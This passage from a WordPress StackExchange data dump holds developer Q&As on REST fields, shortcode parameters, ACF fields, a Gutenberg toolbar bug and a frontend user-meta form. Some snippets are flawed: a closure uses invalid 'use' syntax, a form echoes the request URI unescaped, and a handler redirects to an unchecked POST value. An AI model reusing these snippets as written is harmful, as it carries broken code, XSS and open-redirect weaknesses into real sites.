die(var_dump($post_arr));
return $post_arr['excerpt'];
},
));
register_rest_field('page', 'excerpt', array(
'get_callback' => function ($post_arr) {
die(var_dump($post_arr));
return $post_arr['excerpt'];
},
));
});
```
This causes `wp-json/wp/v2/pages` and `wp-json/wp/v2/posts` to die, but `wp-json/wp/v2/search` works perfectly, although it renders posts and pages.
Any idea how I can add my excerpt to the results of the `wp-json/wp/v2/search` route? | For the search endpoint, the object type (the first parameter for `register_rest_field()`) is `search-result` and not the post type (e.g. `post`, `page`, etc.).
So try with this, which worked for me:
```php
add_action( 'rest_api_init', function () {
// Registers a REST field for the /wp/v2/search endpoint.
register_rest_field( 'search-result', 'excerpt', array(
'get_callback' => function ( $post_arr ) {
return $post_arr['excerpt'];
},
) );
} );
``` |
376,094 | <p>As the title states, I need to pass at least one parameter, maybe more, to the <a href="https://developer.wordpress.org/reference/functions/add_shortcode/" rel="nofollow noreferrer"><code>add_shortcode()</code></a> function. In other words, those parameters I am passing will be used in the callback function of <code>add_shortcode()</code>. How can I do that?</p>
<p>Please note, those have NOTHING to do with the following structure <code>[shortcode 1 2 3]</code> where <code>1</code>, <code>2</code>, and <code>3</code> are the parameters passed by the user. In my case, the parameters are for programming purposes only and should not be the user's responsibility.</p>
<p>Thanks</p>
| [
{
"answer_id": 376096,
"author": "GeorgeP",
"author_id": 160985,
"author_profile": "https://wordpress.stackexchange.com/users/160985",
"pm_score": 0,
"selected": false,
"text": "<p>You can pass an array of attributes ($atts) in the callback function that will run whenever you run add_shortcode().</p>\n<p>notice the <code>$user_defined_attributes</code> in the following example:</p>\n<pre><code>add_shortcode( 'faq', 'process_the_faq_shortcode' );\n/**\n * Process the FAQ Shortcode to build a list of FAQs.\n *\n * @since 1.0.0\n *\n * @param array|string $user_defined_attributes User defined attributes for this shortcode instance\n * @param string|null $content Content between the opening and closing shortcode elements\n * @param string $shortcode_name Name of the shortcode\n *\n * @return string\n */\nfunction process_the_faq_shortcode( $user_defined_attributes, $content, $shortcode_name ) {\n $attributes = shortcode_atts(\n array(\n 'number_of_faqs' => 10,\n 'class' => '',\n ),\n $user_defined_attributes,\n $shortcode_name\n );\n\n // do the processing\n\n // Call the view file, capture it into the output buffer, and then return it.\n ob_start();\n include( __DIR__ . '/views/faq-shortcode.php' );\n return ob_get_clean();\n}\n</code></pre>\n<p>reference: <a href=\"https://gist.github.com/hellofromtonya/ced966dd791820c50aa8010dd582d222\" rel=\"nofollow noreferrer\">hellofromtonya</a></p>\n"
},
{
"answer_id": 376097,
"author": "fuxia",
"author_id": 73,
"author_profile": "https://wordpress.stackexchange.com/users/73",
"pm_score": 2,
"selected": true,
"text": "<p>You can use a <a href=\"https://www.php.net/manual/en/class.closure.php\" rel=\"nofollow noreferrer\">closure</a> for that together with the <code>use</code> keyword. Simple example:</p>\n<pre><code>$dynamic_value = 4;\n\nadd_shortcode( 'shortcodename', \n function( $attributes, $content, $shortcode_name ) use $dynamic_value \n {\n return $dynamic_value;\n }\n);\n</code></pre>\n<p>See also <a href=\"https://wordpress.stackexchange.com/a/45920/73\">Passing a parameter to filter and action functions</a>.</p>\n"
}
] | 2020/10/07 | [
"https://wordpress.stackexchange.com/questions/376094",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/34253/"
] | As the title states, I need to pass at least one parameter, maybe more, to the [`add_shortcode()`](https://developer.wordpress.org/reference/functions/add_shortcode/) function. In other words, those parameters I am passing will be used in the callback function of `add_shortcode()`. How can I do that?
Please note, those have NOTHING to do with the following structure `[shortcode 1 2 3]` where `1`, `2`, and `3` are the parameters passed by the user. In my case, the parameters are for programming purposes only and should not be the user's responsibility.
Thanks | You can use a [closure](https://www.php.net/manual/en/class.closure.php) for that together with the `use` keyword. Simple example:
```
$dynamic_value = 4;
add_shortcode( 'shortcodename',
function( $attributes, $content, $shortcode_name ) use $dynamic_value
{
return $dynamic_value;
}
);
```
See also [Passing a parameter to filter and action functions](https://wordpress.stackexchange.com/a/45920/73). |
376,116 | <pre><code>soliloquy( the_field( 'slider' ) );
</code></pre>
<p>This is my code to add the ID for a slider from a ACF number field to a slider function call however it outputs the ID and doesn't execute the soliloquy function.</p>
<p>I think it might have something to do with the single qoutes.</p>
<p>Not sure how to wrap the slider ID in single qoutes</p>
| [
{
"answer_id": 376117,
"author": "Dev",
"author_id": 104464,
"author_profile": "https://wordpress.stackexchange.com/users/104464",
"pm_score": 0,
"selected": false,
"text": "<p>This works but i prefer to use the ACF specific custom field function</p>\n<pre><code>soliloquy( get_post_meta( get_the_ID(), 'slider', true ) );\n</code></pre>\n"
},
{
"answer_id": 376118,
"author": "Victor Novicov",
"author_id": 189516,
"author_profile": "https://wordpress.stackexchange.com/users/189516",
"pm_score": 2,
"selected": true,
"text": "<p>You need to use <strong>get_field()</strong> function instead. It will RETURN the value instead of printing.\nSo, your code will be:</p>\n<pre><code>soliloquy( get_field( 'slider' ) );\n</code></pre>\n"
}
] | 2020/10/08 | [
"https://wordpress.stackexchange.com/questions/376116",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/104464/"
] | ```
soliloquy( the_field( 'slider' ) );
```
This is my code to add the ID for a slider from a ACF number field to a slider function call however it outputs the ID and doesn't execute the soliloquy function.
I think it might have something to do with the single qoutes.
Not sure how to wrap the slider ID in single qoutes | You need to use **get\_field()** function instead. It will RETURN the value instead of printing.
So, your code will be:
```
soliloquy( get_field( 'slider' ) );
``` |
376,288 | <p>I have a simple Gutenberg block that styles text as a <a href="https://github.com/prtksxna/a-sticky-note/" rel="nofollow noreferrer">post it note</a>. It uses a <code>BlockControls</code> to show some basic formatting like alignment and text styles. Since I upgraded to 5.5, to <code>BlockControls</code> doesn't show up floating over the widget. However, if I change my setting to be <em>Top Toolbar</em> it shows up on top and functions normally (<a href="https://i.stack.imgur.com/sc0Kw.png" rel="nofollow noreferrer">setting screenshot</a>). Note that the <code>InspectorControls</code> are showing up just fine. Here is my `index.js':</p>
<pre class="lang-js prettyprint-override"><code>/* eslint no-unused-vars: 0 */
import { registerBlockType } from '@wordpress/blocks';
import {
RichText,
AlignmentToolbar,
BlockControls,
InspectorControls,
ColorPalette,
} from '@wordpress/block-editor';
import { PanelBody, PanelRow, FontSizePicker } from '@wordpress/components';
import { __ } from '@wordpress/i18n';
registerBlockType( 'sticky-note/sticky-note', {
title: 'Sticky note',
icon: 'pressthis',
category: 'layout',
styles: [
{
name: 'paper',
label: 'Paper', // TODO: What to do here? Use _x
isDefault: true,
},
{
name: 'flat',
label: 'Flat',
},
],
supports: {
align: true,
alignWide: false,
reusable: false,
lightBlockWrapper: true,
},
attributes: {
content: {
type: 'array',
source: 'children',
selector: 'p',
},
alignment: {
type: 'string',
default: 'none',
},
color: {
type: 'string',
default: '#f9eeaa',
},
fontSize: {
type: 'number',
default: 16,
},
},
example: {
attributes: {
content: 'Type something…',
alignment: 'center',
},
},
edit( props ) {
const {
attributes: { content, alignment, color, fontSize },
setAttributes,
} = props;
const onChangeContent = ( newContent ) => {
setAttributes( { content: newContent } );
};
const onChangeAlignment = ( newAlignment ) => {
props.setAttributes( {
alignment: newAlignment === undefined ? 'none' : newAlignment,
} );
};
const onChangeColor = ( newColor ) => {
props.setAttributes( {
color: newColor === undefined ? '#f9eeaa' : newColor,
} );
};
const fontSizes = [
{
name: __( 'Normal' ),
slug: 'normal',
size: 16,
},
{
name: __( 'Medium' ),
slug: 'medium',
size: 20,
},
{
name: __( 'Large' ),
slug: 'large',
size: 36,
},
{
name: __( 'Huge' ),
slug: 'huge',
size: 48,
},
];
const fallbackFontSize = 20;
const onFontSizeChange = ( newFontSize ) => {
props.setAttributes( {
fontSize:
newFontSize === undefined ? fallbackFontSize : newFontSize,
} );
};
return (
<div>
{
<BlockControls>
<AlignmentToolbar
value={ alignment }
onChange={ onChangeAlignment }
/>
</BlockControls>
}
{
<InspectorControls>
<PanelBody title={ __( 'Color' ) }>
<PanelRow>
<ColorPalette
disableCustomColors={ false }
value={ color }
onChange={ onChangeColor }
clearable={ true }
/>
</PanelRow>
</PanelBody>
<PanelBody title={ __( 'Font size' ) }>
<PanelRow>
<FontSizePicker
fontSizes={ fontSizes }
fallbackFontSize={ fallbackFontSize }
value={ fontSize }
onChange={ onFontSizeChange }
/>
</PanelRow>
</PanelBody>
</InspectorControls>
}
<RichText
tagName="p"
className="wp-block-sticky-note-sticky-note"
style={ {
textAlign: alignment,
backgroundColor: color,
fontSize,
} }
onChange={ onChangeContent }
value={ content }
/>
</div>
);
},
save: ( props ) => {
return (
<RichText.Content
className={ `sticky-note-${ props.attributes.alignment }` }
style={ {
fontSize: props.attributes.fontSize,
backgroundColor: props.attributes.color,
} }
tagName="p"
value={ props.attributes.content }
/>
);
},
} );
</code></pre>
<p>This is what the block looks like in the editor, see the floating block controls are missing:
<a href="https://i.stack.imgur.com/MgWkB.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/MgWkB.png" alt="block without toolbar" /></a></p>
<p>But they show up fine and work when the top toolbar setting is selected:
<a href="https://i.stack.imgur.com/oqiJD.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/oqiJD.png" alt="top toolbar working fine" /></a></p>
<p>I have tried removing all the CSS but that doesn't seem to have any effect. I have tested it up to 5.2, where it was working fine. You can find the entire code base on <a href="https://github.com/prtksxna/a-sticky-note" rel="nofollow noreferrer">Github</a>.</p>
| [
{
"answer_id": 376290,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>So I tested your <a href=\"https://github.com/prtksxna/a-sticky-note\" rel=\"nofollow noreferrer\">code</a>, and it seems that the issue happened because you enabled the <code>lightBlockWrapper</code> support for your block type (i.e. <code>lightBlockWrapper: true</code> in the <code>support</code> property), which then doesn't wrap the block in <code>.wp-block</code> — check a <a href=\"https://www.diffchecker.com/FnrBD8um\" rel=\"nofollow noreferrer\">sample diff here</a>.</p>\n<p>And to fix the issue, you'd only need to disable the <code>lightBlockWrapper</code> support — use <code>lightBlockWrapper: false</code> or just don't set <code>lightBlockWrapper</code> at all..</p>\n"
},
{
"answer_id": 408614,
"author": "Shiplu",
"author_id": 118404,
"author_profile": "https://wordpress.stackexchange.com/users/118404",
"pm_score": 0,
"selected": false,
"text": "<p>Try to use same code structure among the edit and save methods. The RIchText need to be waraped inside div.</p>\n<pre><code><div>\n<RichText.Content\n className={ `sticky-note-${ props.attributes.alignment }` }\n style={ {\n fontSize: props.attributes.fontSize,backgroundColor: props.attributes.color,\n } }\n tagName="p"\n value={ props.attributes.content }/>\n</div>\n</code></pre>\n"
}
] | 2020/10/11 | [
"https://wordpress.stackexchange.com/questions/376288",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/148774/"
] | I have a simple Gutenberg block that styles text as a [post it note](https://github.com/prtksxna/a-sticky-note/). It uses a `BlockControls` to show some basic formatting like alignment and text styles. Since I upgraded to 5.5, to `BlockControls` doesn't show up floating over the widget. However, if I change my setting to be *Top Toolbar* it shows up on top and functions normally ([setting screenshot](https://i.stack.imgur.com/sc0Kw.png)). Note that the `InspectorControls` are showing up just fine. Here is my `index.js':
```js
/* eslint no-unused-vars: 0 */
import { registerBlockType } from '@wordpress/blocks';
import {
RichText,
AlignmentToolbar,
BlockControls,
InspectorControls,
ColorPalette,
} from '@wordpress/block-editor';
import { PanelBody, PanelRow, FontSizePicker } from '@wordpress/components';
import { __ } from '@wordpress/i18n';
registerBlockType( 'sticky-note/sticky-note', {
title: 'Sticky note',
icon: 'pressthis',
category: 'layout',
styles: [
{
name: 'paper',
label: 'Paper', // TODO: What to do here? Use _x
isDefault: true,
},
{
name: 'flat',
label: 'Flat',
},
],
supports: {
align: true,
alignWide: false,
reusable: false,
lightBlockWrapper: true,
},
attributes: {
content: {
type: 'array',
source: 'children',
selector: 'p',
},
alignment: {
type: 'string',
default: 'none',
},
color: {
type: 'string',
default: '#f9eeaa',
},
fontSize: {
type: 'number',
default: 16,
},
},
example: {
attributes: {
content: 'Type something…',
alignment: 'center',
},
},
edit( props ) {
const {
attributes: { content, alignment, color, fontSize },
setAttributes,
} = props;
const onChangeContent = ( newContent ) => {
setAttributes( { content: newContent } );
};
const onChangeAlignment = ( newAlignment ) => {
props.setAttributes( {
alignment: newAlignment === undefined ? 'none' : newAlignment,
} );
};
const onChangeColor = ( newColor ) => {
props.setAttributes( {
color: newColor === undefined ? '#f9eeaa' : newColor,
} );
};
const fontSizes = [
{
name: __( 'Normal' ),
slug: 'normal',
size: 16,
},
{
name: __( 'Medium' ),
slug: 'medium',
size: 20,
},
{
name: __( 'Large' ),
slug: 'large',
size: 36,
},
{
name: __( 'Huge' ),
slug: 'huge',
size: 48,
},
];
const fallbackFontSize = 20;
const onFontSizeChange = ( newFontSize ) => {
props.setAttributes( {
fontSize:
newFontSize === undefined ? fallbackFontSize : newFontSize,
} );
};
return (
<div>
{
<BlockControls>
<AlignmentToolbar
value={ alignment }
onChange={ onChangeAlignment }
/>
</BlockControls>
}
{
<InspectorControls>
<PanelBody title={ __( 'Color' ) }>
<PanelRow>
<ColorPalette
disableCustomColors={ false }
value={ color }
onChange={ onChangeColor }
clearable={ true }
/>
</PanelRow>
</PanelBody>
<PanelBody title={ __( 'Font size' ) }>
<PanelRow>
<FontSizePicker
fontSizes={ fontSizes }
fallbackFontSize={ fallbackFontSize }
value={ fontSize }
onChange={ onFontSizeChange }
/>
</PanelRow>
</PanelBody>
</InspectorControls>
}
<RichText
tagName="p"
className="wp-block-sticky-note-sticky-note"
style={ {
textAlign: alignment,
backgroundColor: color,
fontSize,
} }
onChange={ onChangeContent }
value={ content }
/>
</div>
);
},
save: ( props ) => {
return (
<RichText.Content
className={ `sticky-note-${ props.attributes.alignment }` }
style={ {
fontSize: props.attributes.fontSize,
backgroundColor: props.attributes.color,
} }
tagName="p"
value={ props.attributes.content }
/>
);
},
} );
```
This is what the block looks like in the editor, see the floating block controls are missing:
[](https://i.stack.imgur.com/MgWkB.png)
But they show up fine and work when the top toolbar setting is selected:
[](https://i.stack.imgur.com/oqiJD.png)
I have tried removing all the CSS but that doesn't seem to have any effect. I have tested it up to 5.2, where it was working fine. You can find the entire code base on [Github](https://github.com/prtksxna/a-sticky-note). | So I tested your [code](https://github.com/prtksxna/a-sticky-note), and it seems that the issue happened because you enabled the `lightBlockWrapper` support for your block type (i.e. `lightBlockWrapper: true` in the `support` property), which then doesn't wrap the block in `.wp-block` — check a [sample diff here](https://www.diffchecker.com/FnrBD8um).
And to fix the issue, you'd only need to disable the `lightBlockWrapper` support — use `lightBlockWrapper: false` or just don't set `lightBlockWrapper` at all.. |
376,309 | <p>I've made a form on WordPress theme frontend that let registered user change some of their user metadata on page, but it didn't work, code like below:</p>
<pre><code> <form name="update_basic_user_meta" id="update_basic_user_meta" action="<?php echo esc_url( home_url() ); ?>?update_basic_user_meta=true" method="POST">
<select name="gender">
<option value="male" ><?php _e('Male','text-domain');?></option>
<option value="female" ><?php _e('Female','text-domain');?></option>
</select>
<div>
<label><input type="radio" name="specialty" value="0"> <?php _e('Read','text-domain');?></label><br>
<label><input type="radio" name="specialty" value="1"> <?php _e('Write','text-domain');?></label><br>
<label><input type="radio" name="specialty" value="2"> <?php _e('Translate','text-domain');?></label>
</div>
<button name="submit" type="submit"><?php _e('Submit','text-domain');?></button>
<input type="hidden" name="redirect_to" value="<?php echo $_SERVER['REQUEST_URI']; ?>" />
</form>
<?php
function update_basic_user_meta() {
$user_id = current_user_id();
update_user_meta( $user_id, 'gender', $_POST['gender'] );
update_user_meta( $user_id, 'specialty', $_POST['specialty'] );
}
add_filter('init', 'update_basic_user_meta');
?>
</code></pre>
<p>The "Gender" "Specialty" user metadata field is existed and work well on backend user profile page.</p>
<p>Don't have a clue how this form didn’t affect any of the user metadata.</p>
<p>Please help :) Thank you all.</p>
| [
{
"answer_id": 376322,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>There are 3 main issues in your code:</p>\n<ol>\n<li><p>I see you're using <code>current_user_id()</code> which does not exist in WordPress, so I believe that should be <a href=\"https://developer.wordpress.org/reference/functions/get_current_user_id/\" rel=\"nofollow noreferrer\"><code>get_current_user_id()</code></a>.</p>\n</li>\n<li><p>Your <code>update_basic_user_meta()</code> function basically would work in updating the user's metadata, but you need to check whether the POST data (<code>gender</code> and <code>specialty</code>) are actually set before proceeding to update the metadata, and that the GET data named <code>update_basic_user_meta</code> is also set, which means the form was submitted.</p>\n<p>However, if I were you, I would use a <a href=\"https://developer.wordpress.org/reference/functions/wp_nonce_field/\" rel=\"nofollow noreferrer\">nonce field</a> than a simple GET query.</p>\n</li>\n<li><p>You need to highlight the current selection for the "Gender" and "Specialty" options, so that users know what have they selected and whether it was actually saved. So,</p>\n<ul>\n<li><p>For the "Gender" option (which uses <code>select</code> menu), you can use <a href=\"https://developer.wordpress.org/reference/functions/selected/\" rel=\"nofollow noreferrer\"><code>selected()</code></a>.</p>\n</li>\n<li><p>For the "Specialty" option (which uses <code>radio</code> buttons), you can use <a href=\"https://developer.wordpress.org/reference/functions/checked/\" rel=\"nofollow noreferrer\"><code>checked()</code></a>.</p>\n</li>\n</ul>\n</li>\n</ol>\n<p>And despite <code>add_filter()</code> works, <code>init</code> is an action hook, so you should use <code>add_action()</code>:</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_action( 'init', 'update_basic_user_meta' ); // use this\n//add_filter( 'init', 'update_basic_user_meta' ); // not this\n</code></pre>\n<h3>Sample snippets that would make your form works as expected</h3>\n<ol>\n<li><p>Highlight the current selection for the "Gender" option:</p>\n<pre class=\"lang-html prettyprint-override\"><code><?php $gender = get_user_meta( get_current_user_id(), 'gender', true ); ?>\n<select name="gender">\n <option value="male"<?php selected( 'male', $gender ); ?>><?php _e( 'Male', 'text-domain' ); ?></option>\n <option value="female"<?php selected( 'female', $gender ); ?>><?php _e( 'Female', 'text-domain' ); ?></option>\n</select>\n</code></pre>\n</li>\n<li><p>Highlight the current selection for the "Specialty" option:</p>\n<pre class=\"lang-html prettyprint-override\"><code><?php $specialty = get_user_meta( get_current_user_id(), 'specialty', true ); ?>\n<div>\n <label><input type="radio" name="specialty" value="0"<?php checked( '0', $specialty ); ?>> <?php _e( 'Read', 'text-domain' ); ?></label><br>\n <label><input type="radio" name="specialty" value="1"<?php checked( '1', $specialty ); ?>> <?php _e( 'Write', 'text-domain' ); ?></label><br>\n <label><input type="radio" name="specialty" value="2"<?php checked( '2', $specialty ); ?>> <?php _e( 'Translate', 'text-domain' ); ?></label>\n</div>\n</code></pre>\n</li>\n<li><p>Function to update the user's metadata:</p>\n<pre class=\"lang-php prettyprint-override\"><code>function update_basic_user_meta() {\n if ( ! empty( $_GET['update_basic_user_meta'] ) &&\n isset( $_POST['gender'], $_POST['specialty'] ) &&\n $user_id = get_current_user_id()\n ) {\n update_user_meta( $user_id, 'gender', sanitize_text_field( $_POST['gender'] ) );\n update_user_meta( $user_id, 'specialty', sanitize_text_field( $_POST['specialty'] ) );\n\n if ( ! empty( $_POST['redirect_to'] ) ) {\n wp_redirect( $_POST['redirect_to'] );\n exit;\n }\n }\n}\n</code></pre>\n</li>\n</ol>\n"
},
{
"answer_id": 376325,
"author": "Duke Yin",
"author_id": 148298,
"author_profile": "https://wordpress.stackexchange.com/users/148298",
"pm_score": 0,
"selected": false,
"text": "<p>First I want to thank @SallyCJ, you helped me alot:)</p>\n<p>I was modifying the code while you write the answer, and I've got a working code below.</p>\n<pre><code><?php \nfunction update_basic_user_meta() { //define this function\n$user_id = get_current_user_id(); //save the current user id number for further use \n\n?>\n\n<form name="update_basic_user_meta" id="update_basic_user_meta" action="" method="POST"> <!-- figured out should be empty on "action" -->\n\n <input name="nickname" type="text" placeholder="<?php _e('Your name here','journey');?>"> <!-- A text field to get user's nickname change -->\n\n <select name="gender"> <!-- An select to tell is it he or her -->\n <option value="male" ><?php _e('Male','journey');?></option>\n <option value="female" ><?php _e('Female','journey');?></option> \n </select>\n\n <div> <!-- Radio buttons to select what they are good at -->\n <label><input class="uk-radio" type="radio" name="specialty" value="0"> <?php _e('Strong','journey');?></label><br>\n <label><input class="uk-radio" type="radio" name="specialty" value="1"> <?php _e('Balanced','journey');?></label><br>\n <label><input class="uk-radio" type="radio" name="specialty" value="2"> <?php _e('Wise','journey');?></label>\n </div>\n \n <button name="submit" class="uk-button uk-button-primary uk-width-1 uk-margin-small-bottom" type="submit"><?php _e('Inject Soul','journey');?></button>\n\n</form>\n<?php\n if($_POST['nickname'] != ''){ //check one of the field is filled then go, prevent empty stuff goes to database.\n update_user_meta( $user_id, 'nickname', $_POST['nickname'] ); //Save Nickname\n update_user_meta( $user_id, 'gender', $_POST['gender'] ); //Save Gender\n update_user_meta( $user_id, 'specialty', $_POST['specialty'] ); //Save Specialty\n }\n} //end the function\nupdate_basic_user_meta(); //call to the function\nadd_action('init', 'update_basic_user_meta'); // don't know is this necessary after calling the function but still add action of this function.\n?>\n</code></pre>\n<p>Don't know if this is the right way, the main idea is, warp the form arround in a php function, then call to the function to let the form show up, when submit the form, php get the data with $_POST[].</p>\n<p>As you @SallyCJ mentioned users should see what's already in the profile, thanks, indeed I will go further to add the get_user_meta() part to the form.</p>\n<p>That's the progress I've got sofar, not pretty but it works.</p>\n<p>Any way, should I call to add_action() again after call to(execute) the function? Still bothers me haha.</p>\n<p>Thank you again. Really learned alot from your answer.</p>\n"
}
] | 2020/10/12 | [
"https://wordpress.stackexchange.com/questions/376309",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/148298/"
] | I've made a form on WordPress theme frontend that let registered user change some of their user metadata on page, but it didn't work, code like below:
```
<form name="update_basic_user_meta" id="update_basic_user_meta" action="<?php echo esc_url( home_url() ); ?>?update_basic_user_meta=true" method="POST">
<select name="gender">
<option value="male" ><?php _e('Male','text-domain');?></option>
<option value="female" ><?php _e('Female','text-domain');?></option>
</select>
<div>
<label><input type="radio" name="specialty" value="0"> <?php _e('Read','text-domain');?></label><br>
<label><input type="radio" name="specialty" value="1"> <?php _e('Write','text-domain');?></label><br>
<label><input type="radio" name="specialty" value="2"> <?php _e('Translate','text-domain');?></label>
</div>
<button name="submit" type="submit"><?php _e('Submit','text-domain');?></button>
<input type="hidden" name="redirect_to" value="<?php echo $_SERVER['REQUEST_URI']; ?>" />
</form>
<?php
function update_basic_user_meta() {
$user_id = current_user_id();
update_user_meta( $user_id, 'gender', $_POST['gender'] );
update_user_meta( $user_id, 'specialty', $_POST['specialty'] );
}
add_filter('init', 'update_basic_user_meta');
?>
```
The "Gender" "Specialty" user metadata field is existed and work well on backend user profile page.
Don't have a clue how this form didn’t affect any of the user metadata.
Please help :) Thank you all. | There are 3 main issues in your code:
1. I see you're using `current_user_id()` which does not exist in WordPress, so I believe that should be [`get_current_user_id()`](https://developer.wordpress.org/reference/functions/get_current_user_id/).
2. Your `update_basic_user_meta()` function basically would work in updating the user's metadata, but you need to check whether the POST data (`gender` and `specialty`) are actually set before proceeding to update the metadata, and that the GET data named `update_basic_user_meta` is also set, which means the form was submitted.
However, if I were you, I would use a [nonce field](https://developer.wordpress.org/reference/functions/wp_nonce_field/) than a simple GET query.
3. You need to highlight the current selection for the "Gender" and "Specialty" options, so that users know what have they selected and whether it was actually saved. So,
* For the "Gender" option (which uses `select` menu), you can use [`selected()`](https://developer.wordpress.org/reference/functions/selected/).
* For the "Specialty" option (which uses `radio` buttons), you can use [`checked()`](https://developer.wordpress.org/reference/functions/checked/).
And despite `add_filter()` works, `init` is an action hook, so you should use `add_action()`:
```php
add_action( 'init', 'update_basic_user_meta' ); // use this
//add_filter( 'init', 'update_basic_user_meta' ); // not this
```
### Sample snippets that would make your form works as expected
1. Highlight the current selection for the "Gender" option:
```html
<?php $gender = get_user_meta( get_current_user_id(), 'gender', true ); ?>
<select name="gender">
<option value="male"<?php selected( 'male', $gender ); ?>><?php _e( 'Male', 'text-domain' ); ?></option>
<option value="female"<?php selected( 'female', $gender ); ?>><?php _e( 'Female', 'text-domain' ); ?></option>
</select>
```
2. Highlight the current selection for the "Specialty" option:
```html
<?php $specialty = get_user_meta( get_current_user_id(), 'specialty', true ); ?>
<div>
<label><input type="radio" name="specialty" value="0"<?php checked( '0', $specialty ); ?>> <?php _e( 'Read', 'text-domain' ); ?></label><br>
<label><input type="radio" name="specialty" value="1"<?php checked( '1', $specialty ); ?>> <?php _e( 'Write', 'text-domain' ); ?></label><br>
<label><input type="radio" name="specialty" value="2"<?php checked( '2', $specialty ); ?>> <?php _e( 'Translate', 'text-domain' ); ?></label>
</div>
```
3. Function to update the user's metadata:
```php
function update_basic_user_meta() {
if ( ! empty( $_GET['update_basic_user_meta'] ) &&
isset( $_POST['gender'], $_POST['specialty'] ) &&
$user_id = get_current_user_id()
) {
update_user_meta( $user_id, 'gender', sanitize_text_field( $_POST['gender'] ) );
update_user_meta( $user_id, 'specialty', sanitize_text_field( $_POST['specialty'] ) );
if ( ! empty( $_POST['redirect_to'] ) ) {
wp_redirect( $_POST['redirect_to'] );
exit;
}
}
}
``` |
376,317 | <p>I'm being faced very often when I typically go into a saved draft, edit a post and then save it. I'm getting the error:</p>
<blockquote>
<p>Updating failed. The response is not a valid JSON response.</p>
</blockquote>
<p>I'm finding that I can often publish, but if I continue to save as a draft, I may or may not get what I was expecting. I'm seeing titles disappear and other pieces of content. I have reached out to Wordpress and was told to change the 'permalinks' settings and then change back again. This did not work. I was also told to roll back to classic editor, which seems to work, but I want to continue using blocks. How can I resolve this issue without having to downgrade wordpress for our writers?</p>
<p>As was suggested here is the debug below</p>
<pre><code>Exception { name: "NS_ERROR_FAILURE", message: "", result: 2147500037, filename: "https://example.com/libby-heaney-bridges-the-gap-be…ormer-quantum-scientist-she-is-now-a-full-time-artist/embed/", lineNumber: 8, columnNumber: 0, data: null, stack: "l@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:385\n@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:1110\n@https://example.com/libby-heaney-bridges-the-gap-between-science-and-art-a-former-quantum-scientist-she-is-now-a-full-time-artist/embed/:8:1788\n" }
</code></pre>
| [
{
"answer_id": 376322,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>There are 3 main issues in your code:</p>\n<ol>\n<li><p>I see you're using <code>current_user_id()</code> which does not exist in WordPress, so I believe that should be <a href=\"https://developer.wordpress.org/reference/functions/get_current_user_id/\" rel=\"nofollow noreferrer\"><code>get_current_user_id()</code></a>.</p>\n</li>\n<li><p>Your <code>update_basic_user_meta()</code> function basically would work in updating the user's metadata, but you need to check whether the POST data (<code>gender</code> and <code>specialty</code>) are actually set before proceeding to update the metadata, and that the GET data named <code>update_basic_user_meta</code> is also set, which means the form was submitted.</p>\n<p>However, if I were you, I would use a <a href=\"https://developer.wordpress.org/reference/functions/wp_nonce_field/\" rel=\"nofollow noreferrer\">nonce field</a> than a simple GET query.</p>\n</li>\n<li><p>You need to highlight the current selection for the "Gender" and "Specialty" options, so that users know what have they selected and whether it was actually saved. So,</p>\n<ul>\n<li><p>For the "Gender" option (which uses <code>select</code> menu), you can use <a href=\"https://developer.wordpress.org/reference/functions/selected/\" rel=\"nofollow noreferrer\"><code>selected()</code></a>.</p>\n</li>\n<li><p>For the "Specialty" option (which uses <code>radio</code> buttons), you can use <a href=\"https://developer.wordpress.org/reference/functions/checked/\" rel=\"nofollow noreferrer\"><code>checked()</code></a>.</p>\n</li>\n</ul>\n</li>\n</ol>\n<p>And despite <code>add_filter()</code> works, <code>init</code> is an action hook, so you should use <code>add_action()</code>:</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_action( 'init', 'update_basic_user_meta' ); // use this\n//add_filter( 'init', 'update_basic_user_meta' ); // not this\n</code></pre>\n<h3>Sample snippets that would make your form works as expected</h3>\n<ol>\n<li><p>Highlight the current selection for the "Gender" option:</p>\n<pre class=\"lang-html prettyprint-override\"><code><?php $gender = get_user_meta( get_current_user_id(), 'gender', true ); ?>\n<select name="gender">\n <option value="male"<?php selected( 'male', $gender ); ?>><?php _e( 'Male', 'text-domain' ); ?></option>\n <option value="female"<?php selected( 'female', $gender ); ?>><?php _e( 'Female', 'text-domain' ); ?></option>\n</select>\n</code></pre>\n</li>\n<li><p>Highlight the current selection for the "Specialty" option:</p>\n<pre class=\"lang-html prettyprint-override\"><code><?php $specialty = get_user_meta( get_current_user_id(), 'specialty', true ); ?>\n<div>\n <label><input type="radio" name="specialty" value="0"<?php checked( '0', $specialty ); ?>> <?php _e( 'Read', 'text-domain' ); ?></label><br>\n <label><input type="radio" name="specialty" value="1"<?php checked( '1', $specialty ); ?>> <?php _e( 'Write', 'text-domain' ); ?></label><br>\n <label><input type="radio" name="specialty" value="2"<?php checked( '2', $specialty ); ?>> <?php _e( 'Translate', 'text-domain' ); ?></label>\n</div>\n</code></pre>\n</li>\n<li><p>Function to update the user's metadata:</p>\n<pre class=\"lang-php prettyprint-override\"><code>function update_basic_user_meta() {\n if ( ! empty( $_GET['update_basic_user_meta'] ) &&\n isset( $_POST['gender'], $_POST['specialty'] ) &&\n $user_id = get_current_user_id()\n ) {\n update_user_meta( $user_id, 'gender', sanitize_text_field( $_POST['gender'] ) );\n update_user_meta( $user_id, 'specialty', sanitize_text_field( $_POST['specialty'] ) );\n\n if ( ! empty( $_POST['redirect_to'] ) ) {\n wp_redirect( $_POST['redirect_to'] );\n exit;\n }\n 